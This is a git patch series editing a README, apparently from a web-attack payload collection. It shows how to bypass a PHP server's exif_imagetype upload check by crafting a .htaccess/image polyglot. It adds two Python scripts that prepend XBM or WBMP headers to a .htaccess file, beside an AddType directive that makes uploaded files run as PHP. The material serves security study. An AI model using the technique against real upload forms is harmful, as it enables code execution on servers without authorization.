From 7877647db13bd1a539847e4dce5ec83a7b80f3ea Mon Sep 17 00:00:00 2001 From: Vladislav Nechakhin Date: Thu, 7 Feb 2019 14:51:03 +0700 Subject: [PATCH 1/2] Update exif_imagetype bypass --- Upload insecure files/PHP .htaccess/README.md | 32 ++++++++++++++++--- 1 file changed, 28 insertions(+), 4 deletions(-) diff --git a/Upload insecure files/PHP .htaccess/README.md b/Upload insecure files/PHP .htaccess/README.md index aa2eaf3..79eff91 100644 --- a/Upload insecure files/PHP .htaccess/README.md +++ b/Upload insecure files/PHP .htaccess/README.md @@ -27,16 +27,40 @@ AddType application/x-httpd-php .htaccess # .htaccess upload as image -If on server side for determine the type of an image used exif_imagetype function, try upload .htaccess file like [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) image. +If the exif_imagetype function is used on the server side to determine the image type, create a .htaccess/image polyglot. + +[Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In .htacces ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid .htaccess/image polyglot. ```python -#define test_width 100 -#define test_height 100 +# create valid .htaccess/xbm image -# .htaccess file +width = 50 +height = 50 +payload = '# .htaccess file' + +with open('.htaccess', 'w') as htaccess: + htaccess.write('#define test_width %d\n' % (width, )) + htaccess.write('#define test_height %d\n' % (height, )) + htaccess.write(payload) +``` +or +```python +# create valid .htaccess/wbmp image + +type_header = b'\x00' +fixed_header = b'\x00' +width = b'50' +height = b'50' +payload = b'# .htaccess file' + +with open('.htaccess', 'wb') as htaccess: + htaccess.write(type_header + fixed_header + width + height) + htaccess.write(b'\n') + htaccess.write(payload) ``` ## Thanks to * [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html) * [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability) +* [Writeup to l33t-hoster task, Insomnihack Teaser 2019/](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster) From 90db8b0f112c0645320759255fd64ba4b9b67af5 Mon Sep 17 00:00:00 2001 From: Vladislav Nechakhin Date: Thu, 7 Feb 2019 14:59:22 +0700 Subject: [PATCH 2/2] Update exif_imagetype bypass --- Upload insecure files/PHP .htaccess/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Upload insecure files/PHP .htaccess/README.md b/Upload insecure files/PHP .htaccess/README.md index 79eff91..30b059d 100644 --- a/Upload insecure files/PHP .htaccess/README.md +++ b/Upload insecure files/PHP .htaccess/README.md @@ -27,9 +27,9 @@ AddType application/x-httpd-php .htaccess # .htaccess upload as image -If the exif_imagetype function is used on the server side to determine the image type, create a .htaccess/image polyglot. +If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot. -[Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In .htacces ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid .htaccess/image polyglot. +[Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In `.htaccess` ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid `.htaccess/image` polyglot. ```python # create valid .htaccess/xbm image @@ -63,4 +63,4 @@ with open('.htaccess', 'wb') as htaccess: * [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html) * [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability) -* [Writeup to l33t-hoster task, Insomnihack Teaser 2019/](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster) +* [Writeup to l33t-hoster task, Insomnihack Teaser 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster)